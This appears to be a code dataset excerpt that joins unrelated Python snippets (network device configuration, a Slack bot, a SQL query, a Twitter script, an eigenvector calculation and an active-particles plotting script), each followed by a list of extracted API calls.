        cmd_list.append("member {attr}".format(attr=member))
    try:
        device.configure(cmd_list)
    except SubCommandFailure as e:
        raise SubCommandFailure(
            "Configuration failed for l2vpn vfi vpls on "
            "{dev} with exception: {e}".format(
                dev=device.name, e=str(e)
            )
        )
def unconfigure_l2vpn_vfi_context_vpls(device):
    """
    Unconfigures l2vpn vfi context vpls on device
    Args:
        device('obj'): device to configure
    Returns:
        N/A
    Raises:
        SubCommandFailure
    """
    log.info(
        "Unconfiguring l2vpn vfi context vpls on {dev}".format(dev=device.name)
    )
    try:
        # A single negated command removes the whole vfi context.
        device.configure("no l2vpn vfi context vpls")
    except SubCommandFailure as e:
        raise SubCommandFailure(
            "Configuration removal failed for l2vpn vfi vpls on "
            "{dev} with exception: {e}".format(
                dev=device.name, e=str(e)
            )
        )
| [
"logging.getLogger"
] | [((142, 169), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (159, 169), False, 'import logging\n')] |
from os import environ
from MagiSlack.io import MagiIO
from MagiSlack.module import MagiModule
def hello_world(*args, **kwargs):
    """Return a greeting built from the 'name' and 'display_name' keyword
    arguments; positional arguments are accepted but ignored."""
    greeting = "HELLO WORLD! user {}, {}".format(
        kwargs["name"], kwargs["display_name"]
    )
    return greeting
if __name__ == '__main__':
    # Bootstraps the Slack bot: requires SLACK_API_TOKEN in the environment.
    print('Magi Start!')
    print('='*30)
    print('MagiModule Initializing.')
    module = MagiModule.MagiModule(environ['SLACK_API_TOKEN'])
    print('Complete')
    print('='*30)
    print('MagiIO Initializing.')
    io = MagiIO.MagiIO(module)
    print('Complete')
    print('='*30)
    # Register the 'hello' command and enter the event loop (blocks).
    io.set_callback_func('hello', hello_world)
    io.start()
| [
"MagiSlack.module.MagiModule.MagiModule",
"MagiSlack.io.MagiIO.MagiIO"
] | [((330, 379), 'MagiSlack.module.MagiModule.MagiModule', 'MagiModule.MagiModule', (["environ['SLACK_API_TOKEN']"], {}), "(environ['SLACK_API_TOKEN'])\n", (351, 379), False, 'from MagiSlack.module import MagiModule\n'), ((464, 485), 'MagiSlack.io.MagiIO.MagiIO', 'MagiIO.MagiIO', (['module'], {}), '(module)\n', (477, 485), False, 'from MagiSlack.io import MagiIO\n')] |
def get_dosages(connection):
    """Fetch every row of the dosage table.

    Args:
        connection: open DB connection exposing cursor().

    Returns:
        list of dicts with keys 'dosage_id' and 'dosage_name', one per row.
    """
    cursor = connection.cursor()
    cursor.execute("SELECT * from dosage")
    return [
        {"dosage_id": dosage_id, "dosage_name": dosage_name}
        for (dosage_id, dosage_name) in cursor
    ]
if __name__ == '__main__':
    # Manual smoke test: open a connection and dump the dosage table.
    from sql_connection import get_sql_connection
    connection = get_sql_connection()
    print(get_dosages(connection))
| [
"sql_connection.get_sql_connection"
] | [((434, 454), 'sql_connection.get_sql_connection', 'get_sql_connection', ([], {}), '()\n', (452, 454), False, 'from sql_connection import get_sql_connection\n')] |
import jtweeter
# Placeholder credentials: replace with real Twitter app values before running.
access_token = "TWITTER_APP_ACCESS_TOKEN"
access_token_secret = "TWITTER_APP_ACCESS_TOKEN_SECRET"
consumer_key = "TWITTER_APP_CONSUMER_KEY"
consumer_secret = "TWITTER_APP_CONSUMER_SECRET"
user_id = 000000000 #user id of twitter user to simulate.
def main():
    # Delegates entirely to jtweeter with the module-level credentials.
    jtweeter.tweet(access_token, access_token_secret, consumer_key, consumer_secret, user_id)
if __name__ == '__main__':
    main()
"jtweeter.tweet"
] | [((289, 382), 'jtweeter.tweet', 'jtweeter.tweet', (['access_token', 'access_token_secret', 'consumer_key', 'consumer_secret', 'user_id'], {}), '(access_token, access_token_secret, consumer_key,\n consumer_secret, user_id)\n', (303, 382), False, 'import jtweeter\n')] |
import pickle
import numpy as np
def fetch_file(path):
    """Load and return the pickled object stored at *path*."""
    with open(path, "rb") as handle:
        return pickle.load(handle)
def fetch_adj_mat(column):
    """Return the adjacency matrix for the given layer index.

    Maps 0 -> A1, 1 -> A2, 2 -> A3 (module-level globals loaded further
    down in this script); any other index implicitly returns None.
    """
    if column == 0:
        return A1
    elif column == 1:
        return A2
    elif column == 2:
        return A3
    # elif column == 3:
    #     return A4
print("Fetching files...")
# NOTE(review): all three layers load the same "A1_fc.txt" file -- this looks
# like a copy/paste slip (A2/A3 presumably have their own files). Confirm
# against the data directory before trusting the results.
A1 = np.array(
    fetch_file(
        "/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
A2 = np.array(
    fetch_file(
        "/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
A3 = np.array(
    fetch_file(
        "/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
# A4 = np.array(fetch_file(RELATIVE_PATH + ADJACENCY_MATRIX + "A4_fc.txt"))
influence_matrix = np.array(fetch_file(
    "/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/influence_matrix_normal/definition_2/"
    "influence_matrix_fc.txt"))
print(influence_matrix.shape)
# Build the block matrix: for every influence row, scale each adjacency layer
# by its weight and lay the weighted rows side by side.
n_nodes = A1.shape[0]  # was hard-coded to 1134
n_rows = influence_matrix.shape[0]  # was hard-coded to 3
krp = []
for i in range(n_rows):
    wa1 = A1 * influence_matrix[i][0]
    wa2 = A2 * influence_matrix[i][1]
    wa3 = A3 * influence_matrix[i][2]
    # wa4 = A4 * influence_matrix_normal[i][3]
    print(influence_matrix[i][0])
    print(influence_matrix[i][1])
    print(influence_matrix[i][2])
    # print(influence_matrix_normal[i][3])
    for j in range(n_nodes):
        row = []
        row.extend(wa1[j])
        row.extend(wa2[j])
        row.extend(wa3[j])
        # row.extend(wa4[j])
        krp.append(row)
print("Clearing variables...")
A1 = None
A2 = None
A3 = None
# A4 = None
influence_matrix = None
print("Setting up kr_product...")
# BUG FIX: np.float was deprecated and removed in NumPy 1.20; the builtin
# float is the exact equivalent (float64).
kr_product = np.array(krp, dtype=float)
krp.clear()
print(kr_product.shape)
print(kr_product)
print("Calculating eigenvector...")
e_val, e_vec = np.linalg.eig(kr_product)
# argmax also handles complex eigenvalues (lexicographic on real, then
# imaginary part), where list(...).index(max(...)) raised TypeError.
ind = int(np.argmax(e_val))
print(ind)
# BUG FIX: np.linalg.eig returns eigenvectors as *columns*, so the vector for
# e_val[ind] is e_vec[:, ind]; the previous e_vec[ind] took a row instead.
pev = e_vec[:, ind] / np.linalg.norm(e_vec[:, ind])
print(pev.shape)
print(pev)
print(sum(map(lambda x: x.real * x.real, pev)))
print("Saving eigenvector...")
with open("global_eigenvector_fc.txt", 'wb') as fp:
    pickle.dump(pev, fp)
print("Saving eigenvalues...")
with open("eigenvalue_" + str(ind) + "_fc.txt", "wb") as fp:
    pickle.dump(e_val[ind], fp)
print("Process finished!")
| [
"pickle.dump",
"numpy.linalg.eig",
"pickle.load",
"numpy.array",
"numpy.linalg.norm"
] | [((1745, 1774), 'numpy.array', 'np.array', (['krp'], {'dtype': 'np.float'}), '(krp, dtype=np.float)\n', (1753, 1774), True, 'import numpy as np\n'), ((1871, 1896), 'numpy.linalg.eig', 'np.linalg.eig', (['kr_product'], {}), '(kr_product)\n', (1884, 1896), True, 'import numpy as np\n'), ((1992, 2018), 'numpy.linalg.norm', 'np.linalg.norm', (['e_vec[ind]'], {}), '(e_vec[ind])\n', (2006, 2018), True, 'import numpy as np\n'), ((2185, 2205), 'pickle.dump', 'pickle.dump', (['pev', 'fp'], {}), '(pev, fp)\n', (2196, 2205), False, 'import pickle\n'), ((2303, 2330), 'pickle.dump', 'pickle.dump', (['e_val[ind]', 'fp'], {}), '(e_val[ind], fp)\n', (2314, 2330), False, 'import pickle\n'), ((105, 120), 'pickle.load', 'pickle.load', (['fp'], {}), '(fp)\n', (116, 120), False, 'import pickle\n')] |
"""
Module comparison superimposes most probable local density, maximum
cooperativity, time of maximum cooperativity and ratio of transversal and
longitudinal correlations at time of maximum cooperativity, as functions of
the Péclet number, for different trajectories in the phase diagram (either
varying persistence time at fixed self-propelling velocity or varying
self-propelling velocity at fixed persistence time).
Simulation directories must follow the active_particles.naming.AHB2D naming
standard and input files in simulation directories must follow the
active_particles.naming.VarN standard (local densities) and either the
active_particles.naming.Cuu standard (for cooperativities from displacement
correlations), or active_particles.naming.Cww standard (for cooperativities
from displacement relative to centre of mass displacement correlations), or
active_particles.naming.Cdd standard (for cooperativities from displacement
norm correlations), or active_particles.naming.Cee (for cooperativities from
displacement direction correlations).
Environment modes
-----------------
CORRELATION : string
Correlations from which to calculate cooperativities and extract
longitudinal and transversal components.
_____________________________________________________________
| Mode | Correlations |
|______|______________________________________________________|
| Cuu | displacement |
|______|______________________________________________________|
| Cww | displacement relative to centre of mass displacement |
|______|______________________________________________________|
| Cdd | displacement norm |
|______|______________________________________________________|
| Cee | displacement direction |
|______|______________________________________________________|
DEFAULT: Cuu
DRDT : bool
Use the product of the rotation diffusion constant and lag time rather
than the bare lag time.
DEFAULT: True
SHOW : bool
Show comparison plot.
DEFAULT: True
Environment parameters
----------------------
DATA_DIRECTORY : string
Data directory.
DEFAULT: active_particles.naming.sim_directory
EXCLUDE : string
Simulation directories in DATA_DIRECTORY to exclude from the plots.
DEFAULT:
PARAMETERS_FILE : string
Simulation parameters file name.
DEFAULT: active_particles.naming.parameters_file
IMAGE_NAME : string
Default image file name.
DEFAULT: active_particles.plot.comparison._image_name
N : int
Number of particles.
DEFAULT: active_particles.plot.comparison._N
VARIABLES (mandatory) : string separated by ':'
Trajectory variable in order of trajectory.
_______________________________________
| Mode | Variable |
|_________|_____________________________|
| 'dr' | Rotation diffusion constant |
|_________|_____________________________|
| 'vzero' | self-propelling velocity |
|_________|_____________________________|
VAR_MIN (mandatory) : float separated by ':'
Minimum value of trajectory variable in order of trajectory.
VAR_MAX (mandatory) : float separated by ':'
Maximum value of trajectory variable in order of trajectory.
VAR_C (mandatory) : float separated by ':'
Trajectory variable transition value in order of trajectory.
NOTE: A vertical line is displayed at the corresponding Péclet number.
FIXED_VAR (mandatory) : float separated by ':'
Fixed variable value in order of trajectory.
DENSITIES (mandatory) : float separated by ':'
Packing fractions of particles in order of trajectory.
INITIAL_FRAME_PHILOC : int
Frame to consider as initial in local densities calculations.
DEFAULT: active_particles.plot.pphiloc._init_frame
INTERVAL_MAXIMUM_PHILOC : int
Maximum number of frames on which densities are calculated.
DEFAULT: active_particles.plot.pphiloc._int_max
BOX_SIZE_PHILOC : float
Length of the square boxes in which particles are counted.
DEFAULT: active_particles.plot.pphiloc._box_size
N_CASES_PHILOC : int
Number of boxes in each direction in which local densities are computed.
DEFAULT: active_particles.plot.pphiloc._Ncases
N_BINS : int
Number of bins for the local densities histogram.
DEFAULT: active_particles.plot.pphiloc._Nbins
PHIMAX : float
Maximum local density for the local densities histogram.
DEFAULT: active_particles.plot.pphiloc._phimax
BOX_SIZE_COR : float
Size of the square box which was considered for correlations.
DEFAULT: simulation box size
X_ZERO : float
Centre of the of the box x-coordinate for correlations.
DEFAULT: 0
Y_ZERO : float
Centre of the of the box y-coordinate for correlations.
DEFAULT: 0
INITIAL_FRAME_COR : int
Frame to consider as initial for correlations.
DEFAULT: active_particles.plot.chi_msd._init_frame_cor
INTERVAL_MAXIMUM_COR : int
Maximum number of intervals of length dt considered for correlations.
DEFAULT: active_particles.plot.chi_msd._int_max_cor
N_CASES_COR : int
Number of boxes in each direction with which the displacement grid is
computed.
DEFAULT: active_particles.plot.chi_msd._Ncases_cor
R_MIN : float
Minimum radius for correlations integration.
DEFAULT: active_particles.plot.chi_msd._r_min
R_MAX : float
Maximum radius for correlations integration.
DEFAULT: active_particles.plot.chi_msd._r_max
FONT_SIZE : int
Plot font size.
DEFAULT: active_particles.plot.comparison._font_size
MARKER_SIZE : int
Plot marker size.
DEFAULT: active_particles.plot.comparison._marker_size
COLORMAPS : string separated by ':'
Plot colormaps to choose from.
DEFAULT: active_particles.plot.comparison._colormaps
RATIO_LEGEND : float
Width ratio between legend and figure.
DEFAULT: active_particles.plot.comparison._ratio_legend
WSPACE : float
Plots width space.
DEFAULT: active_particles.plot.comparison._wspace
HSPACE : float
Plots height space.
DEFAULT: active_particles.plot.comparison._hspace
X_SCALE : string
Plots x-scale.
DEFAULT: active_particles.plot.comparison._x_scale
PHILOC_YS : string
Most probable local density y-scale.
DEFAULT: active_particles.plot.comparison._philoc_ys
CHI_YS : string
Maximum cooperativity y-scale.
DEFAULT: active_particles.plot.comparison._chi_ys
DT_YS : string
Time of maximum cooperativity y-scale.
DEFAULT: active_particles.plot.comparison._dt_ys
RATIOTL_YS : string
Ratio of transversal and longitudinal correlations y-scale.
DEFAULT: active_particles.plot.comparison._ratioTL_ys
Output
------
> Saves figure to IMAGE_NAME.
[SHOW mode]
> Displays plot.
"""
import active_particles.naming as naming
from active_particles.init import get_env, get_env_list
from os import environ as envvar
if __name__ == '__main__': envvar['SHOW'] = 'True'
from os.path import join as joinpath
from active_particles.plot.plot import list_colormap, list_markers,\
list_linestyles
from active_particles.plot.pphiloc import Philoc,\
_init_frame as _init_frame_philoc, _int_max as _int_max_philoc,\
_box_size as _box_size_philoc, _Ncases as _Ncases_philoc,\
_Nbins, _phimax
from active_particles.plot.chi_msd import ChiMsd,\
_init_frame_cor, _int_max_cor, _Ncases_cor, _r_min, _r_max
from active_particles.plot.corlcort import CLCT
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
from matplotlib.lines import Line2D
# DEFAULT VARIABLES
_N = int(1e5) # default number of particles
_font_size = 25 # default plot font size
_marker_size = 20 # default plot marker size
_colormaps = ('cool', 'hot') # default plot colormaps
_wspace = 0.4 # default plot width space
_hspace = 0.05 # default plot height space
_ratio_legend = 2 # default width ratio between graphs and legends
_x_scale = 'log' # default plots x-scale
_philoc_ys = 'linear' # default most probable local density y-scale
_chi_ys = 'log' # default maximum cooperativity y-scale
_dt_ys = 'log' # default time of maximum cooperativity y-scale
_ratioTL_ys = 'linear' # default ratio of transversal and longitudinal correlations y-scale
_image_name = joinpath(get_env('HOME'), 'comparison.eps') # default image file name
# SCRIPT
if __name__ == '__main__': # executing as script
# VARIABLES DEFINITIONS
var = get_env_list('VARIABLES') # plot variables
var_min = get_env_list('VAR_MIN', vartype=float) # minimum values of plot variable
var_max = get_env_list('VAR_MAX', vartype=float) # maximum values of plot variable
var_c = get_env_list('VAR_C', vartype=float) # plot variable transition value
fixed_var = get_env_list('FIXED_VAR', vartype=float) # values of fixed variables
densities = get_env_list('DENSITIES', vartype=float) # packing fractions of particles
if not(len(var) == len(var_min) == len(var_max) == len(fixed_var)
== len(var_c) == len(densities)):
raise IndexError(
'VARIABLES, VAR_MIN, VAR_MAX, VAR_C, FIXED_VAR and DENSITIES \
must have equal lengths.')
comparisons = len(var) # number of trajectories to compare
var_label = [] # variables labels
fix_label = [] # fixed variable labels
var_attribute = [] # variables attribute to be displayed in file names
pe_func = [] # Péclet number as function of plot variable
for index in range(comparisons):
if var[index] == 'dr':
var_label += ['\\tilde{\\nu}_r']
fix_label += ['\\tilde{v}']
var_attribute += [{'vzero': fixed_var[index]}]
pe_func += [(lambda index: lambda x: fixed_var[index]/x)(index)]
elif var[index] == 'vzero':
var_label += ['\\tilde{v}']
fix_label += ['\\tilde{\\nu}_r']
var_attribute += [{'dr': fixed_var[index]}]
pe_func += [(lambda index: lambda x: x/fixed_var[index])(index)]
else: raise ValueError('Variable %s is not known.' % var[index])
cor = get_env('CORRELATION', default='Cuu') # correlation variable
if cor == 'Cuu': # cooperativities from
naming_cor = naming.Cuu() # correlations naming object
cor_name = 'C_{uu}' # correlations name
elif cor == 'Cww':
naming_cor = naming.Cww() # correlations naming object
cor_name = 'C_{\\delta u \\delta u}' # correlations name
elif cor == 'Cdd':
naming_cor = naming.Cdd() # correlations naming object
cor_name = 'C_{|u||u|}' # correlations name
elif cor == 'Cee':
naming_cor = naming.Cee() # correlations naming object
cor_name = 'C_{\\hat{u}\\hat{u}}' # correlations name
else: raise ValueError('Correlation %s is not known.' % cor) # correlation is not known
data_dir = get_env('DATA_DIRECTORY', default=naming.sim_directory) # data directory
excluded_directories = get_env('EXCLUDE', default='') # directories to exclude
parameters_file = get_env('PARAMETERS_FILE',
default=naming.parameters_file) # simulations parameters file name
N = get_env('N', default=_N, vartype=int) # number of particles
init_frame_philoc = get_env('INITIAL_FRAME_PHILOC',
default=_init_frame_philoc, vartype=int) # frame to consider as initial in local densities calculations
int_max_philoc = get_env('INTERVAL_MAXIMUM_PHILOC',
default=_int_max_philoc, vartype=int) # maximum number of frames on which densities are calculated
box_size_philoc = get_env('BOX_SIZE_PHILOC',
default=_box_size_philoc, vartype=float) # length of the square boxes in which particles are counted
Ncases_philoc = get_env('N_CASES_PHILOC',
default=_Ncases_philoc, vartype=int) # number of boxes in each direction in which local densities are computed
Nbins = get_env('N_BINS', default=_Nbins, vartype=int) # number of bins for the local densities histogram
phimax = get_env('PHIMAX', default=_phimax, vartype=float) # maximum local density for the local densities histogram
box_size_cor = get_env('BOX_SIZE_COR', vartype=float) # size of the square box which was considered for correlations
centre_cor = (get_env('X_ZERO', default=0, vartype=float),
get_env('Y_ZERO', default=0, vartype=float)) # centre of the box for correlations
init_frame_cor = get_env('INITIAL_FRAME_COR',
default=_init_frame_cor, vartype=int) # frame to consider as initial for correlations
int_max_cor = get_env('INTERVAL_MAXIMUM_COR',
default=_int_max_cor, vartype=int) # maximum number of intervals of length dt considered for correlations
Ncases_cor = get_env('N_CASES_COR', default=_Ncases_cor, vartype=int) # number of boxes in each direction with which the displacement grid is computed
r_min = get_env('R_MIN', default=_r_min, vartype=float) # minimum radius for correlations integration
r_max = get_env('R_MAX', default=_r_max, vartype=float) # maximum radius for correlations integration
# NAMING
attributes_philoc = {'N': N, 'init_frame': init_frame_philoc,
'int_max': int_max_philoc, 'Ncases': Ncases_philoc,
'box_size': box_size_philoc} # attributes displayed in local densities file names
attributes_cor = {'N': N, 'init_frame': init_frame_cor,
'int_max': int_max_cor, 'Ncases': Ncases_cor, 'box_size': box_size_cor,
'x_zero': centre_cor[0], 'y_zero': centre_cor[1]} # attributes displayed in correlations file names
naming_varN = naming.VarN() # varN naming object
naming_simdir = naming.AHB2D() # simulation directory naming object
# PLOT PARAMETERS
font_size = get_env('FONT_SIZE', default=_font_size, vartype=float) # plot font size
marker_size = get_env('MARKER_SIZE', default=_marker_size, vartype=int) # plot marker size
mpl.rcParams.update({'font.size': font_size,
'lines.markersize': marker_size})
colormaps = get_env_list('COLORMAPS') # plot colormaps
if colormaps == []: colormaps = _colormaps # no plot colormaps provided, use default
while len(colormaps) < comparisons: colormaps += colormaps # at least as much colormaps as trajectories to compare
ratio_legend = get_env('RATIO_LEGEND',
default=_ratio_legend, vartype=float) # width ratio between graphs and legends
wspace = get_env('WSPACE', default=_wspace, vartype=float) # plots width space
hspace = get_env('HSPACE', default=_hspace, vartype=float) # plots height space
x_scale = get_env('X_SCALE', default=_x_scale) # plots x-scale
philoc_ys = get_env('PHILOC_YS', default=_philoc_ys) # most probable local density y-scale
chi_ys = get_env('CHI_YS', default=_chi_ys) # maximum cooperativity y-scale
dt_ys = get_env('DT_YS', default=_dt_ys) # time of maximum cooperativity y-scale
ratioTL_ys = get_env('RATIOTL_YS', default=_ratioTL_ys) # ratio of transversal and longitudinal correlations y-scale
multiply_with_dr = get_env('DRDT', default=True, vartype=bool) # plot dr*dt rather than dt
if multiply_with_dr:
dt_label = r'$\tilde{\nu}_r \Delta t^*$' # dt label
else: dt_label = r'$\Delta t^*$' # dt label
# CALCULATION
philoc = [] # local densities histogram calculators
chimsd = [] # cooperativities calculators
clct = [] # longtidunal and transversal correlations calculators
for v, vmin, vmax, phi, vattribute\
in zip(var, var_min, var_max, densities, var_attribute):
philoc += [Philoc(data_dir, naming_simdir,
{'density': phi, **vattribute, **attributes_philoc},
parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
philoc[-1].calculate(naming_varN,
{'density': phi, **vattribute, **attributes_philoc}, Nbins, phimax)
chimsd += [ChiMsd(data_dir, naming_simdir,
{'density': phi, **vattribute, **attributes_cor},
parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
chimsd[-1].calculate(naming_cor,
{'density': phi, **vattribute, **attributes_cor}, r_min, r_max,
box_size=box_size_cor, multiply_with_dr=multiply_with_dr)
clct += [CLCT(data_dir, naming_simdir,
{'density': phi, **vattribute, **attributes_cor},
parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
clct[-1].calculate(naming_cor,
{'density': phi, **vattribute, **attributes_cor},
multiply_with_dr=multiply_with_dr)
clct[-1].calculate_max(chimsd[-1].dtmax)
# PLOT
colors = list(map(
lambda philoc_traj, chimsd_traj, clct_traj, cmap:
list_colormap(
sorted(philoc_traj.var_list + chimsd_traj.var_list +
clct_traj.var_list),
colormap=cmap),
*(philoc, chimsd, clct, colormaps))) # plot colors hash tables
markers = list(map(
lambda philoc_traj, chimsd_traj, clct_traj:
list_markers(
sorted(philoc_traj.time_step_list + chimsd_traj.time_step_list
+ clct_traj.time_step_list)),
*(philoc, chimsd, clct))) # plot markers hash tables
linestyles = list_linestyles(range(comparisons)) # Péclet transition values vertical lines
fig = plt.figure()
fig.set_size_inches(30, 30)
fig.subplots_adjust(wspace=wspace)
fig.subplots_adjust(hspace=hspace)
fig.suptitle(
r'$N=%.2e$' % N + '\n' + r'$[%s]:$' % cor_name
+ r'$S_{init}=%.2e, S_{max}=%.2e,$' % (init_frame_cor, int_max_cor)
+ r'$N_{cases}=%.2e, r_{min}=%.2e,$' % (Ncases_cor, r_min)
+ r'$r_{max}=%.2e$' % r_max + '\n'
+ r'$[\phi^*_{loc}]: S_{init}=%.2e,$' % init_frame_philoc
+ r'$S_{max}=%.2e, N_{cases}=%.2e,$' % (int_max_philoc, Ncases_philoc)
+ r'$r_{max}=%.2e$' % box_size_philoc)
gs = GridSpec(4, 1 + comparisons,
width_ratios=[1] + comparisons*[1/(comparisons*ratio_legend)])
ax_philoc = plt.subplot(gs[0, 0])
ax_philoc.set_xscale(x_scale)
ax_philoc.set_yscale(philoc_ys)
ax_philoc.set_ylabel(r'$\phi^*_{loc}$')
ax_chi = plt.subplot(gs[1, 0])
ax_chi.set_xscale(x_scale)
ax_chi.set_yscale(chi_ys)
ax_chi.set_ylabel(r'$\chi(\Delta t^*) = \frac{1}{L^2}$'
+ r'$\int_{r=r_{min}}^{r=r_{max}} dr 2 \pi r %s(r, \Delta t^*)$'
% cor_name)
ax_dt = plt.subplot(gs[2, 0])
ax_dt.set_xscale(x_scale)
ax_dt.set_yscale(dt_ys)
ax_dt.set_ylabel(dt_label)
ax_ratioTL = plt.subplot(gs[3, 0])
ax_ratioTL.set_xscale(x_scale)
ax_ratioTL.set_xlabel(r'$Pe$')
ax_ratioTL.set_yscale(ratioTL_ys)
ax_ratioTL.set_ylabel(r'$%s^T/%s^L(\Delta t^*)$' % (cor_name, cor_name))
plt.setp(
[ax.get_xticklabels() for ax in [ax_philoc, ax_chi, ax_dt]],
visible=False)
axes_legend = [plt.subplot(gs[:, 1 + traj]) for traj in range(comparisons)]
for (phi, f_label, f_var, c_label, c_var, x_func, philoc_traj, chimsd_traj,
clct_traj, colors_traj, markers_traj, linestyle, ax_legend)\
in zip(densities, fix_label, fixed_var, var_label, var_c, pe_func,
philoc, chimsd, clct, colors, markers, linestyles.values(),
axes_legend):
x_func_var_c = x_func(c_var)
ax_philoc.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in philoc_traj.philocmax:
var_value = philoc_traj.var_hash[dir]
ax_philoc.scatter(
x_func(var_value), philoc_traj.philocmax[dir],
color=colors_traj[var_value],
marker=markers_traj[philoc_traj.time_step[dir]])
ax_chi.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in chimsd_traj.chimax:
if not(chimsd_traj.isinvarinterval[dir]): continue
var_value = chimsd_traj.var_hash[dir]
ax_chi.scatter(
x_func(var_value), chimsd_traj.chimax[dir],
color=colors_traj[var_value],
marker=markers_traj[chimsd_traj.time_step[dir]])
ax_dt.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in chimsd_traj.dtmax:
if not(chimsd_traj.isinvarinterval[dir]): continue
var_value = chimsd_traj.var_hash[dir]
ax_dt.scatter(
x_func(var_value), chimsd_traj.dtmax[dir],
color=colors_traj[var_value],
marker=markers_traj[chimsd_traj.time_step[dir]])
ax_ratioTL.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in clct_traj.ratioTL_max:
var_value = clct_traj.var_hash[dir]
ax_ratioTL.scatter(
x_func(var_value), clct_traj.ratioTL_max[dir],
color=colors_traj[var_value],
marker=markers_traj[clct_traj.time_step[dir]])
legend = [
Line2D([0], [0], lw=0,
label=r'$\phi=%1.2f, %s=%.1e$' % (phi, f_label, f_var)),
Line2D([0], [0], lw=0),
Line2D([0], [0], linestyle=linestyle, color='black',
label=r'$%s = %.1e$' % (c_label, c_var)),
Line2D([0], [0], lw=0)]
legend += list(map(
lambda var_value: Line2D([0], [0],
color=colors_traj[var_value],
label=r'$%s = %.1e$' % (c_label, var_value)),
colors_traj))
legend += [Line2D([0], [0], lw=0)]
legend += list(map(
lambda time_step: Line2D([0], [0], lw=0, color='black',
marker=markers_traj[time_step],
label=r'$dt = %.1e$' % time_step),
markers_traj))
ax_legend.axis('off')
ax_legend.legend(handles=legend, loc='center')
# SAVING
fig.savefig(get_env('IMAGE_NAME', default=_image_name))
# SHOW
if get_env('SHOW', default=True, vartype=bool): plt.show()
| [
"active_particles.naming.AHB2D",
"active_particles.naming.Cee",
"matplotlib.rcParams.update",
"matplotlib.pyplot.show",
"active_particles.naming.Cww",
"active_particles.plot.pphiloc.Philoc",
"active_particles.plot.chi_msd.ChiMsd",
"matplotlib.lines.Line2D",
"active_particles.init.get_env",
"active... | [((8387, 8402), 'active_particles.init.get_env', 'get_env', (['"""HOME"""'], {}), "('HOME')\n", (8394, 8402), False, 'from active_particles.init import get_env, get_env_list\n'), ((8551, 8576), 'active_particles.init.get_env_list', 'get_env_list', (['"""VARIABLES"""'], {}), "('VARIABLES')\n", (8563, 8576), False, 'from active_particles.init import get_env, get_env_list\n'), ((8632, 8670), 'active_particles.init.get_env_list', 'get_env_list', (['"""VAR_MIN"""'], {'vartype': 'float'}), "('VAR_MIN', vartype=float)\n", (8644, 8670), False, 'from active_particles.init import get_env, get_env_list\n'), ((8726, 8764), 'active_particles.init.get_env_list', 'get_env_list', (['"""VAR_MAX"""'], {'vartype': 'float'}), "('VAR_MAX', vartype=float)\n", (8738, 8764), False, 'from active_particles.init import get_env, get_env_list\n'), ((8818, 8854), 'active_particles.init.get_env_list', 'get_env_list', (['"""VAR_C"""'], {'vartype': 'float'}), "('VAR_C', vartype=float)\n", (8830, 8854), False, 'from active_particles.init import get_env, get_env_list\n'), ((8915, 8955), 'active_particles.init.get_env_list', 'get_env_list', (['"""FIXED_VAR"""'], {'vartype': 'float'}), "('FIXED_VAR', vartype=float)\n", (8927, 8955), False, 'from active_particles.init import get_env, get_env_list\n'), ((9003, 9043), 'active_particles.init.get_env_list', 'get_env_list', (['"""DENSITIES"""'], {'vartype': 'float'}), "('DENSITIES', vartype=float)\n", (9015, 9043), False, 'from active_particles.init import get_env, get_env_list\n'), ((10295, 10332), 'active_particles.init.get_env', 'get_env', (['"""CORRELATION"""'], {'default': '"""Cuu"""'}), "('CORRELATION', default='Cuu')\n", (10302, 10332), False, 'from active_particles.init import get_env, get_env_list\n'), ((11116, 11171), 'active_particles.init.get_env', 'get_env', (['"""DATA_DIRECTORY"""'], {'default': 'naming.sim_directory'}), "('DATA_DIRECTORY', default=naming.sim_directory)\n", (11123, 11171), False, 'from active_particles.init import 
get_env, get_env_list\n'), ((11217, 11247), 'active_particles.init.get_env', 'get_env', (['"""EXCLUDE"""'], {'default': '""""""'}), "('EXCLUDE', default='')\n", (11224, 11247), False, 'from active_particles.init import get_env, get_env_list\n'), ((11310, 11368), 'active_particles.init.get_env', 'get_env', (['"""PARAMETERS_FILE"""'], {'default': 'naming.parameters_file'}), "('PARAMETERS_FILE', default=naming.parameters_file)\n", (11317, 11368), False, 'from active_particles.init import get_env, get_env_list\n'), ((11421, 11458), 'active_particles.init.get_env', 'get_env', (['"""N"""'], {'default': '_N', 'vartype': 'int'}), "('N', default=_N, vartype=int)\n", (11428, 11458), False, 'from active_particles.init import get_env, get_env_list\n'), ((11528, 11600), 'active_particles.init.get_env', 'get_env', (['"""INITIAL_FRAME_PHILOC"""'], {'default': '_init_frame_philoc', 'vartype': 'int'}), "('INITIAL_FRAME_PHILOC', default=_init_frame_philoc, vartype=int)\n", (11535, 11600), False, 'from active_particles.init import get_env, get_env_list\n'), ((11696, 11768), 'active_particles.init.get_env', 'get_env', (['"""INTERVAL_MAXIMUM_PHILOC"""'], {'default': '_int_max_philoc', 'vartype': 'int'}), "('INTERVAL_MAXIMUM_PHILOC', default=_int_max_philoc, vartype=int)\n", (11703, 11768), False, 'from active_particles.init import get_env, get_env_list\n'), ((11867, 11934), 'active_particles.init.get_env', 'get_env', (['"""BOX_SIZE_PHILOC"""'], {'default': '_box_size_philoc', 'vartype': 'float'}), "('BOX_SIZE_PHILOC', default=_box_size_philoc, vartype=float)\n", (11874, 11934), False, 'from active_particles.init import get_env, get_env_list\n'), ((12027, 12089), 'active_particles.init.get_env', 'get_env', (['"""N_CASES_PHILOC"""'], {'default': '_Ncases_philoc', 'vartype': 'int'}), "('N_CASES_PHILOC', default=_Ncases_philoc, vartype=int)\n", (12034, 12089), False, 'from active_particles.init import get_env, get_env_list\n'), ((12188, 12234), 'active_particles.init.get_env', 'get_env', 
